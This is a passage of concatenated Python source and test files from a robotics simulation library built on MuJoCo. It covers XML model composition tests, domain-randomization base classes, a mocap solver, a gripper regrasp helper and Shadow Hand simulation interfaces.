</mujoco>
"""
XML_ARM = """
<mujoco>
<worldbody>
<body name="arm">
<joint type="hinge" name="hinge_joint" axis="0 0 1"/>
<geom name="sphere" pos="0.00 0.00 0.00" type="sphere" size="0.1 0.1 0.1"/>
<body name="forearm" pos="1 0 0">
<joint type="slide" axis="1 0 0" name="slide_joint"/>
<geom name="box" pos="0.00 0.00 0.00" type="box" size="0.1 0.1 0.1"/>
</body>
</body>
</worldbody>
</mujoco>
"""
def test_simple_mujoco_setup():
ball_one = (
MujocoXML.from_string(XML_BALL)
.add_name_prefix("ball_one:")
.set_named_objects_attr("ball_one:ball", pos=[1, 0, 0])
)
ball_two = (
MujocoXML.from_string(XML_BALL)
.add_name_prefix("ball_two:")
.set_named_objects_attr("ball_two:ball", pos=[-1, 0, 0])
)
main = (
MujocoXML().add_default_compiler_directive().append(ball_one).append(ball_two)
)
simulation = SimulationInterface(main.build())
simulation.register_joint_group("ball_one", "ball_one:ball_joint")
simulation.register_joint_group("ball_two", "ball_two:ball_joint")
assert simulation.get_qpos("ball_one").shape == (7,)
assert simulation.get_qpos("ball_two").shape == (7,)
assert simulation.get_qvel("ball_one").shape == (6,)
assert simulation.get_qvel("ball_two").shape == (6,)
qpos1 = np.random.randn(3)
qrot1 = uniform_quat(global_randstate)
qpos1_combined = np.concatenate([qpos1, qrot1])
qpos2 = np.random.randn(3)
qrot2 = uniform_quat(global_randstate)
qpos2_combined = np.concatenate([qpos2, qrot2])
simulation.set_qpos("ball_one", qpos1_combined)
simulation.set_qpos("ball_two", qpos2_combined)
assert np.linalg.norm(simulation.get_qpos("ball_one") - qpos1_combined) < 1e-6
assert np.linalg.norm(simulation.get_qpos("ball_two") - qpos2_combined) < 1e-6
def test_more_complex_mujoco_setup():
xml = (
MujocoXML()
.add_default_compiler_directive()
.append(
MujocoXML.from_string(XML_ARM)
.add_name_prefix("arm_one:")
.set_named_objects_attr("arm_one:ball", pos=[0, 1, 0])
)
.append(
MujocoXML.from_string(XML_ARM)
.add_name_prefix("arm_two:")
.set_named_objects_attr("arm_two:ball", pos=[0, -1, 0])
)
)
simulation = SimulationInterface(xml.build())
simulation.register_joint_group("arm_one", "arm_one:")
simulation.register_joint_group("arm_one_hinge", "arm_one:hinge_joint")
simulation.register_joint_group("arm_two", "arm_two:")
simulation.register_joint_group("arm_two_hinge", "arm_two:hinge_joint")
assert simulation.get_qpos("arm_one").shape == (2,)
assert simulation.get_qvel("arm_one").shape == (2,)
assert simulation.get_qpos("arm_two").shape == (2,)
assert simulation.get_qvel("arm_two").shape == (2,)
assert simulation.get_qpos("arm_one_hinge").shape == (1,)
assert simulation.get_qvel("arm_one_hinge").shape == (1,)
assert simulation.get_qpos("arm_two_hinge").shape == (1,)
assert simulation.get_qvel("arm_two_hinge").shape == (1,)
initial_qpos_one = simulation.get_qpos("arm_one")
initial_qpos_two = simulation.get_qpos("arm_two")
simulation.set_qpos("arm_one_hinge", 0.1)
# Chech that we are setting the right hinge joint
assert np.linalg.norm(simulation.get_qpos("arm_one") - initial_qpos_one) > 0.09
assert np.linalg.norm(simulation.get_qpos("arm_two") - initial_qpos_two) < 1e-6
def test_set_attributes_mixed_precision():
main = (
MujocoXML()
.add_default_compiler_directive()
.append(
MujocoXML.from_string(XML_BALL).set_named_objects_attr(
"ball", pos=[1, 1e-8, 1e-12]
)
)
)
simulation = SimulationInterface(main.build())
ball_id = simulation.sim.model.body_name2id("ball")
ball_pos = simulation.sim.model.body_pos[ball_id]
target_pos = np.array([1, 1e-8, 1e-12])
# test relative error cause absolute error can be quite small either way
assert np.linalg.norm((ball_pos / target_pos) - 1) < 1e-6
def test_forward_kinematics_on_inverted_pendulum():
mxml = MujocoXML.parse(
"test/inverted_pendulum/inverted_double_pendulum.xml"
).add_name_prefix("ivp:")
simulation = SimulationInterface(mxml.build())
simulation.register_joint_group("pendulum", "ivp:")
joint_names = list(map(lambda x: "ivp:%s" % x, ["hinge", "hinge2"]))
site_names = list(map(lambda x: "ivp:%s" % x, ["hinge2_site", "tip"]))
KIN = ForwardKinematics.prepare(
mxml, "ivp:cart", np.zeros(3), np.zeros(3), site_names, joint_names
)
for _ in range(5):
simulation.mj_sim.data.ctrl[0] = random.random()
for _ in range(100):
simulation.step()
simulation.forward()
site_positions = np.array(
[simulation.mj_sim.data.get_site_xpos(site) for site in site_names]
)
joint_pos = simulation.get_qpos("pendulum")
kinemetics_positions = KIN.compute(joint_pos, return_joint_pos=True)
assert (np.abs(site_positions - kinemetics_positions[:2]) < 1e-6).all()
assert (np.abs(site_positions[0] - kinemetics_positions[-1]) < 1e-6).all()
def test_remove_elem():
ball_without_joint = MujocoXML.from_string(XML_BALL).remove_objects_by_tag(
"freejoint"
)
ref_xml = """
<mujoco>
<worldbody>
<body name="ball">
<geom name="sphere" pos="0.00 0.00 0.00" size="0.1 0.1 0.1" type="sphere" />
</body>
</worldbody>
</mujoco>
"""
assert ref_xml.strip() == ball_without_joint.xml_string().strip()
def test_mj_error_callback():
message = None
called = False
def callback(msg):
nonlocal message
message = msg.decode()
raise RuntimeError(message)
cymj.set_error_callback(callback)
try:
with cymj.wrap_mujoco_warning():
functions.mju_error("error")
except RuntimeError as e:
assert e.args[0] == "error"
assert message == "error"
called = True
assert called
```
#### File: robogym/randomization/common.py
```python
import abc
from collections import OrderedDict
from enum import Enum
from typing import Dict, Generic, List, Optional, Tuple, TypeVar
import numpy as np
VType = TypeVar("VType", int, float)
class DType(Enum):
INT = (1,)
FLOAT = 2
class RandomizerParameter(Generic[VType], abc.ABC):
"""
Base interface for randomizer parameter.
"""
INT = DType.INT
FLOAT = DType.FLOAT
def __init__(
self,
name: str,
initial_value: VType,
value_range: Tuple[VType, VType],
delta: Optional[VType] = None,
):
self.name = name
self._value_range: Tuple[VType, VType] = self._convert_range(value_range)
self._value: VType = self._convert_value(initial_value)
self._delta: Optional[VType] = self._convert_delta(delta)
################################################
# External APIs to interact with domain randomization.
def get_value(self) -> VType:
return self._value
def set_value(self, value: VType):
self._value = self._convert_value(value)
def get_range(self) -> Tuple[VType, VType]:
return self._value_range
def get_delta(self) -> Optional[VType]:
return self._delta
@property
@abc.abstractmethod
def dtype(self):
pass
################################################
# Internal methods.
def _convert_value(self, value: VType) -> VType:
low, high = self.get_range()
value = self._convert_type(value)
assert (
low <= value <= high
), ( # type: ignore
f"Value {value} is not within range of [{low}, {high}]"
)
return value
def _convert_range(self, value_range: Tuple[VType, VType]) -> Tuple[VType, VType]:
assert (
len(value_range) == 2
), f"Invalid range {value_range}, must tuple of two values."
low, high = value_range
return self._convert_type(low), self._convert_type(high)
def _convert_delta(self, delta: Optional[VType]):
if delta is not None:
return self._convert_type(delta)
else:
return None
@classmethod
@abc.abstractmethod
def _convert_type(cls, val: VType) -> VType:
pass
def __repr__(self):
return (
f"{self.__class__}(\n"
f"value={self.get_value()}\n"
f"range={self.get_range()}\n"
f")"
)
TType = TypeVar("TType")
class Randomizer(abc.ABC, Generic[TType]):
"""
Base interface for a randomizer.
"""
def __init__(self, name: str, enabled: bool = True):
self.name = name
self._parameters: Dict[str, RandomizerParameter] = OrderedDict()
self._enabled = enabled
def randomize(self, target: TType, random_state: np.random.RandomState) -> TType:
if self._enabled:
return self._randomize(target, random_state)
else:
return target
@abc.abstractmethod
def _randomize(self, target: TType, random_state: np.random.RandomState) -> TType:
pass
def get_parameters(self) -> List[RandomizerParameter]:
"""
Return all parameters for this randomizer.
"""
return list(self._parameters.values())
def get_parameter(self, name: str) -> RandomizerParameter:
"""
Get parameter by name.
"""
assert (
name in self._parameters
), f"Parameter {name} does not exist in randomizer {self.name}."
return self._parameters[name]
def register_parameter(self, parameter: RandomizerParameter):
"""
Register a parameter for this randomizer.
"""
assert (
parameter.name not in self._parameters
), f"Parameter with name {parameter.name} already exists."
self._parameters[parameter.name] = parameter
return parameter
def enable(self):
"""
Enable the randomizer.
"""
self._enabled = True
def disable(self):
self._enabled = False
@property
def enabled(self):
return self._enabled
def reset(self):
"""
Reset state of the randomizer. Called during environment reset.
"""
pass
RType = TypeVar("RType", bound=Randomizer)
class RandomizerCollection(Generic[RType]):
"""
Interface for collection of randomizers, it provides functionality
to register child randomizers and retrieve their parameters.
"""
def __init__(self):
self._randomizers = OrderedDict()
def register_randomizer(self, randomizer: RType) -> RType:
"""
Add a randomizer to the collection.
"""
assert (
randomizer.name not in self._randomizers
), f"Randomizer with name {randomizer.name} already exists."
self._randomizers[randomizer.name] = randomizer
return randomizer
def get_randomizers(self) -> List[RType]:
"""
Get all randomizers.
"""
return list(self._randomizers.values())
def get_randomizer(self, name) -> RType:
"""
Get randomizer by name.
"""
assert name in self._randomizers, f"Randomizer {name} does not exist"
return self._randomizers[name]
def _get_randomizer_parameters(self) -> List[RandomizerParameter]:
parameters = []
for randomizer in self.get_randomizers():
parameters.extend(randomizer.get_parameters())
return parameters
class ChainedRandomizer(
Randomizer[TType], RandomizerCollection[RType], Generic[TType, RType],
):
"""
Base class for randomizer which is composition of multiple randomizers.
During randomize, it will each randomizer in order on given target, for example
ChainedRandomizer('cr', [r1, r2, r3]).randomize(target) is equivalent to
r1.randomize(r2.randomize(r3.randomize(target)))
"""
def __init__(self, name, randomizers: List[RType]):
Randomizer.__init__(self, name, enabled=True)
RandomizerCollection.__init__(self) # type: ignore
for randomizer in randomizers:
self.register_randomizer(randomizer)
def _randomize(self, target: TType, random_state: np.random.RandomState) -> TType:
for randomizer in self.get_randomizers():
target = randomizer.randomize(target, random_state)
return target
def get_parameters(self):
return self._get_randomizer_parameters()
def reset(self):
for randomizer in self.get_randomizers():
randomizer.reset()
```
#### File: randomization/tests/test_randomization.py
```python
import unittest
import attr
import numpy as np
from robogym.randomization.env import (
EnvActionRandomizer,
EnvObservationRandomizer,
EnvParameterRandomizer,
EnvRandomization,
EnvSimulationRandomizer,
build_randomizable_param,
)
from robogym.randomization.observation import ObservationRandomizer
from robogym.randomization.parameters import FloatRandomizerParameter
class DummyRandomizerParameter(FloatRandomizerParameter):
def __init__(self, name, val):
super().__init__(
name, val, value_range=(-1.0, 1.0), delta=1.0,
)
@attr.s(auto_attribs=True)
class DummyNestedEnvParameter:
c: int = build_randomizable_param(1, low=-3, high=3)
@attr.s(auto_attribs=True)
class DummyEnvParameter:
a: int = build_randomizable_param(0, low=-5, high=5)
b: float = build_randomizable_param(0.0, low=-1.0, high=1.0)
x: int = 0 # Non randomizable parameter.
nested: DummyNestedEnvParameter = DummyNestedEnvParameter()
class DummyObservationRandomizer(ObservationRandomizer):
def __init__(self, name, val):
super().__init__(name)
self.val = self.register_parameter(val)
def _randomize(self, target, random_state):
target[self.val.name] = self.val.get_value()
return target
class TestRandomization(unittest.TestCase):
def setUp(self):
super().setUp()
self.random_state = np.random.RandomState()
def test_randomizer_parameters(self):
parameter = DummyRandomizerParameter("foo", 0.0)
assert parameter.get_value() == 0.0
assert parameter.get_range() == (-1.0, 1.0)
assert parameter.get_delta() == 1.0
parameter.set_value(1.0)
assert parameter.get_value() == 1.0
def test_randomizer_basic(self):
"""
Test functionality of basic randomizer.
"""
randomizer = EnvParameterRandomizer(DummyEnvParameter())
assert len(randomizer.get_parameters()) == 3
# Make sure register duplicate parameter is not allowed.
with self.assertRaises(AssertionError):
randomizer.register_parameter(DummyRandomizerParameter("a", 1))
randomizer.register_parameter(DummyRandomizerParameter("d", 1))
assert len(randomizer.get_parameters()) == 4
randomizer.get_parameter("a").set_value(1)
randomizer.get_parameter("b").set_value(0.5)
randomizer.get_parameter("c").set_value(2)
parameters = randomizer.randomize(DummyEnvParameter(), self.random_state)
assert parameters.a == 1
assert parameters.b == 0.5
assert parameters.nested.c == 2
randomizer.disable()
parameters = randomizer.randomize(DummyEnvParameter(), self.random_state)
randomizer.get_parameter("a").set_value(1)
assert parameters.a == 0
def test_observation_randomizer(self):
randomizer = EnvObservationRandomizer(
[
DummyObservationRandomizer("r1", DummyRandomizerParameter("foo", 0.0)),
DummyObservationRandomizer("r2", DummyRandomizerParameter("bar", 1.0)),
]
)
assert len(randomizer.get_randomizers()) == 2
assert len(randomizer.get_parameters()) == 2
obs = randomizer.randomize({}, self.random_state)
assert obs["foo"] == 0.0
assert obs["bar"] == 1.0
def test_env_randomization(self):
randomization = EnvRandomization(
parameter_randomizer=EnvParameterRandomizer(DummyEnvParameter()),
observation_randomizer=EnvObservationRandomizer(
[
DummyObservationRandomizer(
"r1", DummyRandomizerParameter("foo", 0.0)
),
]
),
action_randomizer=EnvActionRandomizer([]),
simulation_randomizer=EnvSimulationRandomizer([]),
)
randomization.update_parameter("observation.r1:foo", 0.5)
parameter = randomization.get_parameter("observation.r1:foo")
assert parameter.get_value() == 0.5
```
#### File: control/tcp/mocap_solver.py
```python
from typing import Optional
import numpy as np
from gym.envs.robotics import utils
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.control.tcp.solver import PrincipalAxis, Solver
from robogym.utils import rotation
class MocapSolver(Solver):
"""
A TCP solver class that uses Mujoco's mocap weld
to track and apply TCP control.
"""
JOINT_MAPPING = {
PrincipalAxis.PITCH: 5,
}
def __init__(
self,
simulation: SimulationInterface,
body_name: str,
robot_prefix: str,
quat_dof_dims: np.ndarray,
alignment_axis: Optional[PrincipalAxis],
):
super().__init__(
simulation, body_name, robot_prefix, quat_dof_dims, alignment_axis
)
def get_tcp_quat(self, ctrl: np.ndarray) -> np.ndarray:
assert len(ctrl) == len(
self.dof_dims
), f"Unexpected control dim {len(ctrl)}, should be {len(self.dof_dims)}"
euler = np.zeros(3)
euler[self.dof_dims_axes] = ctrl
quat = rotation.euler2quat(euler)
gripper_quat = self.mj_sim.data.get_body_xquat(self.body_name)
if self.alignment_axis is not None:
return (
self.align_axis(
rotation.quat_mul(gripper_quat, quat), self.alignment_axis.value
)
- gripper_quat
)
return rotation.quat_mul(gripper_quat, quat) - gripper_quat
def set_action(self, action: np.ndarray) -> None:
utils.mocap_set_action(self.mj_sim, action)
def reset(self):
utils.reset_mocap_welds(self.mj_sim)
utils.reset_mocap2body_xpos(self.mj_sim)
@staticmethod
def align_axis(cmd_quat, axis):
""" Align quaternion into given axes """
alignment = np.zeros(3)
alignment[axis] = 1
mtx = rotation.quat2mat(cmd_quat)
# Axis that is the closest (by dotproduct) to alignment
axis_nr = np.abs((alignment.T @ mtx)).argmax()
# Axis of the cmd_quat
axis = mtx[:, axis_nr]
axis = axis * np.sign(axis @ alignment)
difference_quat = rotation.vectors2quat(axis, alignment)
return rotation.quat_mul(difference_quat, cmd_quat)
```
#### File: gripper/mujoco/regrasp_helper.py
```python
from typing import List, Optional
import numpy as np
class RegraspHelper:
"""
A helper that attempts to facilitate persistent object grasping by a gripper. When the helper
detects backdrive due to neutral commands preceded by a close command on the gripper, it will
re-issue the previous command that is deemed as more desirable than the backdrive result to
prevent objects slipping due to incomplete grasping control.
"""
def __init__(self, initial_position: np.ndarray):
self.regrasp_command = None # current command that we issue so that we re-grasp
self.prev_obs_position = (
initial_position # previous joint observation (=current val)
)
self.last_nonzero_cmd_direction = None # last user desired trajectory
self.last_nonzero_obs_direction = None # last actual trajectory
self.prev_action = None # last command
self.second_prev_action = None # second to last command
self.debug_regrasp = (
False # set this to True to print debug information for re-grasping
)
if self.debug_regrasp:
self.debug_desired_action_history: List[float] = []
self.debug_desired_action_dir_history: List[str] = []
self.debug_observed_pos_history: List[float] = []
self.debug_observed_pos_dir_history: List[str] = []
self.debug_returned_ctrl_history: List[np.ndarray] = []
@staticmethod
def debug_dir_to_string(direction: Optional[float]):
"""For debugging only, given a float representing a direction, return a human friendly string.
:param direction: Positive for Closing, Negative for Opening and zero for Keeping. None is also accepted.
:return: String representation of the float interpreted as a direction.
"""
if direction is None:
return "None"
elif direction == 0:
return "Keep"
elif direction > 0:
return "Close"
elif direction < 0:
return "Open"
@staticmethod
def debug_add_to_history(
history: List, item: object, max_history: float = 20
) -> None:
"""For debugging only. Adds the given item to the given list, and removes the first object if the list
length becomes bigger than the max history limit. This method will pop at most one item, so it expects
max history limit to be constant.
:param history: List to add the item.
:param item: Item to add.
:param max_history: Limit for the list. This method will pop one item if the list exceeds this limit after
adding the item.
"""
history.append(item)
if len(history) > max_history:
history.pop(0)
def debug_print_regrasp_history(self) -> None:
"""Pretty print the history of debug variables that help debug regrasp."""
print("- - - - -")
print(
f"DesCmdHist : {['{0:0.5f}'.format(i) for i in self.debug_desired_action_history]}"
)
print(f"DesCmdDirHist: {self.debug_desired_action_dir_history}")
print(
f"ObsPosHist : {['{0:0.5f}'.format(i) for i in self.debug_observed_pos_history]}"
)
print(f"ObsPosDirHist: {self.debug_observed_pos_dir_history}")
print(
f"PrevReturns : {['{0:0.5f}'.format(i) for i in self.debug_returned_ctrl_history]}"
)
def compute_regrasp_control(
self,
position_control: np.ndarray,
default_control: np.ndarray,
current_position: np.ndarray,
) -> np.ndarray:
"""
Computes control override if applicable given the current state of gripper and controls
:param position_control: Applied absolute position control
:param default_control: Computed default denormalized control that would apply without re-grasp correction
:param current_position: Current gripper joint position reading
:return: re-grasp corrected control
"""
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 1) Compute variables that will help us make the re-grasp decision
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# note some of these variables are not used, but its code is reflected for completeness purposes
# current position delta
assert self.prev_obs_position is not None
obs_move = current_position - self.prev_obs_position
obs_direction = (
0.0 if np.allclose(obs_move, 0, atol=1e-5) else np.sign(obs_move)
)
# what does the user want to do now?
user_wants_to_open = position_control < 0.0
user_wants_to_close = position_control > 0.0
user_wants_to_keep = position_control == 0.0
# what did the user want to do last
# user_last_trajectory_was_opening = self.last_nonzero_cmd_direction and self.last_nonzero_cmd_direction < 0.0
user_last_trajectory_was_closing = (
self.last_nonzero_cmd_direction and self.last_nonzero_cmd_direction > 0.0
)
# what is the gripper doing now? (note this is influenced by the previous command, not the desired command)
gripper_is_opening = obs_direction < 0.0
# gripper_is_closing = obs_direction > 0.0
# gripper_is_still = obs_direction == 0.0
# what was the gripper last trajectory
# gripper_was_opening_or_still = self.last_nonzero_obs_direction and self.last_nonzero_obs_direction < 0.0
gripper_was_closing_or_still = (
self.last_nonzero_obs_direction and self.last_nonzero_obs_direction > 0.0
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 2) If we are currently regrasping, we have special handling to do first
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
is_regrasping = self.regrasp_command is not None
if is_regrasping:
if user_wants_to_open:
# stop re-grasping
self.regrasp_command = None
elif user_wants_to_close:
# if the user wants to close, let the code continue down. The default behavior for the algorithm
# will compute the user desired control, and compare it to the regrasp, actually enacting the
# user one if re-grasping would have been a worse command (in terms of closing the gripper)
pass
else:
# directly continue re-issuing the same command we decided when we started re-grasping
return self.regrasp_command
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 3) This is where we decide if we should re-grasp
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# we want to regrasp if all of these are true:
# 1) the user wants to close or keep the position
# 2) the last thing the user wanted to do was closing the gripper (not opening). Being still is ignored here *
# 3) the gripper was indeed closing or staying still after closing
# 4) the gripper is now opening
# Since it was closing, and now opening, and the user wants to close or keep closed, and the gripper did already
# try to close, the fact that everything says that it should be closing, but it is actually opening, hints
# at an external force trying to open it, and we asumme here that is backdrive.
#
# * note on (2). The reason why this matters is because if the user wanted to open, we would expect the gripper
# to open some time after that user command (typically 1-n ticks later depending on current momementum.) Just
# because the user wants to close now we can't expect the gripper to close. In order to expect the gripper
# to close or keep closed, we must require that the last intention was to close from a more open position.
user_wants_to_close_or_keep = user_wants_to_close or user_wants_to_keep
user_expects_close_or_keep = (
user_wants_to_close_or_keep and user_last_trajectory_was_closing
)
if (
user_expects_close_or_keep
and gripper_was_closing_or_still
and gripper_is_opening
):
# This is the command that we will issue as part of the regrasp. Note that instead we could calculate
# force applied on the object. In this case, what we do is re-issue the last command that led to
# a positive move / closing the gripper. Since the last command led to opening now, we must use at
# least the second to last, which given our algorithm that requires past trajectories, we can guarantee
# that it exists by now.
assert self.second_prev_action is not None
self.regrasp_command = self.second_prev_action
# now print debug information so that we know that we are regrasping (if debug is required)
if self.debug_regrasp:
print(
f"user wants to : {self.debug_dir_to_string(position_control[0])}"
)
print(f"gripper is : {self.debug_dir_to_string(obs_direction)}")
self.debug_print_regrasp_history()
print("This is an undesired opening!! Enabling re-grasp:")
print(
f"We would like to keep {self.prev_obs_position}, and will reissue {self.regrasp_command} for it"
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 4) Compare re-grasping command to what the user wants to do
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# if we have a re-grasp command, we will keep it if it's better than the user one
if self.regrasp_command is None:
returned_control = default_control
else:
# check if the user command is better, and if so update regrasp to the new command
user_is_better = default_control[0] > self.regrasp_command[0]
if user_is_better:
if self.debug_regrasp:
print(
f"The user command {default_control} is better than {self.regrasp_command}, will update it."
)
self.regrasp_command = default_control
returned_control = self.regrasp_command
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 5) Update cached values to help next frame make the re-grasp decision
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
command_direction = (
None
if np.allclose(position_control, 0, atol=1e-5)
else np.sign(position_control)
)
# user trajectory
if command_direction != 0.0:
self.last_nonzero_cmd_direction = command_direction
# observations and observation trajectory
self.prev_obs_position = current_position
if obs_direction != 0.0:
self.last_nonzero_obs_direction = obs_direction
# actual actions that are returned
self.second_prev_action = self.prev_action
self.prev_action = returned_control
# update history only if we are debugging
if self.debug_regrasp:
self.debug_add_to_history(
self.debug_desired_action_history, position_control[0]
)
self.debug_add_to_history(
self.debug_desired_action_dir_history,
self.debug_dir_to_string(command_direction),
)
self.debug_add_to_history(
self.debug_observed_pos_history, current_position[0]
)
self.debug_add_to_history(
self.debug_observed_pos_dir_history,
self.debug_dir_to_string(obs_direction),
)
self.debug_add_to_history(
self.debug_returned_ctrl_history, returned_control[0]
)
return returned_control
```
#### File: shadow_hand/mujoco/mujoco_shadow_hand.py
```python
import numpy as np
from mujoco_py.generated import const
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.shadow_hand.hand_forward_kinematics import (
FINGERTIP_SITE_NAMES,
REFERENCE_SITE_NAMES,
get_relative_positions,
)
from robogym.robot.shadow_hand.hand_interface import ACTUATORS, Hand, Observation
from robogym.robot.shadow_hand.hand_utils import (
denormalize_by_limit,
normalize_by_limits,
)
from robogym.robot.shadow_hand.mujoco.parameter_manager import MuJoCoParameterManager
class MuJoCoObservation(Observation):
""" Shadow Hand observation coming from the MuJoCo simulation """
def __init__(
self, simulation: SimulationInterface, hand_prefix: str, joint_group: str
):
fingers = np.array(
[
simulation.mj_sim.data.get_site_xpos(hand_prefix + site)
for site in FINGERTIP_SITE_NAMES
]
)
reference = np.array(
[
simulation.mj_sim.data.get_site_xpos(hand_prefix + site)
for site in REFERENCE_SITE_NAMES
]
)
self._fingertip_positions = get_relative_positions(fingers, reference)
self._joint_positions = simulation.get_qpos(joint_group).copy()
self._joint_vel = simulation.get_qvel(joint_group).copy()
self._time = simulation.mj_sim.data.time
self._force_limits = simulation.mj_sim.model.actuator_forcerange.copy()
self._actuator_force = normalize_by_limits(
simulation.mj_sim.data.actuator_force, self._force_limits
)
def joint_positions(self) -> np.ndarray:
return self._joint_positions
def joint_velocities(self) -> np.ndarray:
return self._joint_vel
def actuator_effort(self) -> np.ndarray:
return self._actuator_force
def timestamp(self) -> float:
return self._time
def fingertip_positions(self) -> np.ndarray:
return self._fingertip_positions
class MuJoCoShadowHand(Hand):
"""
MuJoCo interface to interact with robotic Shadow Hand
"""
def get_name(self) -> str:
return "unnamed-mujoco-shadowhand"
def __init__(
self, simulation: SimulationInterface, hand_prefix="robot0:", autostep=False
):
"""
:param simulation: simulation interface for the MuJoCo shadow hand xml
:param hand_prefix: Prefix to add to the joint names while constructing the MuJoCo simulation
:param autostep: When true, calls step() on the simulation whenever a control is set. This
should only be used only when the MuJoCoShadowHand is being controlled without a
SimulationRunner in the loop.
"""
self.simulation = simulation
self.hand_prefix = hand_prefix
self.autostep = autostep
self.joint_group = hand_prefix + "hand_joint_angles"
self.simulation.register_joint_group(self.joint_group, prefix=hand_prefix)
self._parameter_manager = MuJoCoParameterManager(self.mj_sim)
assert self.mj_sim.model.nu == len(
ACTUATORS
), "Action space must have compatible shape"
# Are we in the joint control mode or in the force control mode?
self.joint_control_mode = True
self.force_limits = self.mj_sim.model.actuator_forcerange.copy()
# Store copies of parameters in the initial state
self.gainprm_copy = self.mj_sim.model.actuator_gainprm.copy()
self.biasprm_copy = self.mj_sim.model.actuator_biasprm.copy()
self.ctrlrange_copy = self.mj_sim.model.actuator_ctrlrange.copy()
def parameter_manager(self):
return self._parameter_manager
def actuator_ctrl_range_upper_bound(self) -> np.ndarray:
# We use control range in xml instead of constants to take into account
# ADR randomization for joint limit.
return self.mj_sim.model.actuator_ctrlrange[:, 1]
def actuator_ctrl_range_lower_bound(self) -> np.ndarray:
# We use control range in xml instead of constants to take into account
# ADR randomization for joint limit.
return self.mj_sim.model.actuator_ctrlrange[:, 0]
@property
def mj_sim(self):
""" MuJoCo MjSim simulation object """
return self.simulation.mj_sim
def set_position_control(self, control: np.ndarray) -> None:
assert self.is_position_control_valid(control), f"Invalid control: {control}"
if not self.joint_control_mode:
# Need to change the parameters of the motors
# state.
self.mj_sim.model.actuator_gaintype[:] = const.GAIN_USER
self.mj_sim.model.actuator_biastype[:] = const.BIAS_USER
self.mj_sim.model.actuator_gainprm[:] = self.gainprm_copy
self.mj_sim.model.actuator_biasprm[:] = self.biasprm_copy
self.mj_sim.model.actuator_ctrlrange[:] = self.ctrlrange_copy
self.joint_control_mode = True
self.mj_sim.data.ctrl[:] = control
if self.autostep:
self.mj_sim.step()
def set_effort_control(self, control: np.ndarray) -> None:
if self.joint_control_mode:
# Need to change the parameters of the motors
self.mj_sim.model.actuator_gaintype[:] = const.GAIN_FIXED
self.mj_sim.model.actuator_biastype[:] = const.BIAS_NONE
self.mj_sim.model.actuator_gainprm[:, 0] = 1.0
self.mj_sim.model.actuator_biasprm[:] = 0
self.mj_sim.model.actuator_ctrlrange[:] = np.array([[-1.0, 1.0]])
self.joint_control_mode = False
# Transform 0 and 1 into force limits
force_applied = denormalize_by_limit(control, self.force_limits)
self.mj_sim.data.ctrl[:] = force_applied
if self.autostep:
self.mj_sim.step()
def observe(self) -> Observation:
return MuJoCoObservation(self.simulation, self.hand_prefix, self.joint_group)
```
#### File: shadow_hand/mujoco/shadow_hand_simulation.py
```python
import numpy as np
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.shadow_hand.mujoco.mujoco_shadow_hand import MuJoCoShadowHand
class ShadowHandSimulation(SimulationInterface):
"""
MuJoCo simulation containing only the shadow hand
"""
# Robot hand xml
HAND_XML = "robot/shadowhand/main.xml"
# Just a floor
FLOOR_XML = "floor/basic_floor.xml"
# XML with default light
LIGHT_XML = "light/default.xml"
@classmethod
def build(
cls, n_substeps: int = 10, timestep: float = 0.008, name_prefix: str = "robot0:"
):
"""
Construct MjSim object for this simulation
:param name_prefix - to append to names of all objects in the MuJoCo model of the hand;
by default no prefix is appended.
"""
xml = MujocoXML()
xml.add_default_compiler_directive()
max_contacts_params = dict(njmax=2000, nconmax=200)
xml.append(
MujocoXML.parse(cls.FLOOR_XML).set_named_objects_attr(
"floor", tag="body", pos=[1, 1, 0]
)
)
xml.append(
MujocoXML.parse(cls.HAND_XML)
.add_name_prefix(name_prefix)
.set_objects_attr(tag="size", **max_contacts_params)
.set_objects_attr(tag="option", timestep=timestep)
.set_named_objects_attr(
f"{name_prefix}hand_mount",
tag="body",
pos=[1.0, 1.25, 0.15],
euler=[np.pi / 2, 0, np.pi],
)
.remove_objects_by_name(f"{name_prefix}annotation:outer_bound")
# Remove hand base free joint so that hand is immovable
.remove_objects_by_name(f"{name_prefix}hand_base")
)
xml.append(MujocoXML.parse(cls.LIGHT_XML))
return cls(sim=xml.build(nsubsteps=n_substeps), hand_prefix=name_prefix)
def __init__(self, sim, hand_prefix="robot0:"):
super().__init__(sim)
self.enable_pid()
self.shadow_hand = MuJoCoShadowHand(self, hand_prefix=hand_prefix)
```
#### File: mujoco/simulation/base.py
```python
from robogym.envs.rearrange.common.utils import geom_ids_of_body
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.gripper.mujoco.mujoco_robotiq_gripper import MujocoRobotiqGripper
from robogym.robot.robot_interface import RobotControlParameters
class ArmSimulationInterface(SimulationInterface):
"""
Creates a SimulationInterface with a rearrange-compatible robot-gripper and a
table setup. Subclass this and implement make_objects_xml() to create other tasks.
"""
DEFAULT_RENDER_SIZE = 100
BASE_XML = "robot/ur16e/base.xml"
def __init__(
self, sim, robot_control_params: RobotControlParameters,
):
super().__init__(sim)
self.register_joint_group("robot", prefix=["robot0:"])
self.register_joint_group(
"gripper", prefix=["robot0:r_gripper", "robot0:l_gripper"]
)
self.control_param = robot_control_params
self.enable_pid()
# initialize a gripper in sim so that it can be used to sync state if we need to.
self._gripper = MujocoRobotiqGripper(
simulation=self, robot_control_params=robot_control_params, autostep=False
)
# Hide mocap since not very helpful and clutters vision.
mocap_id = self.mj_sim.model.body_name2id("robot0:mocap")
mocap_geom_start_id = self.mj_sim.model.body_geomadr[mocap_id]
mocap_geom_end_id = (
mocap_geom_start_id + self.mj_sim.model.body_geomnum[mocap_id]
)
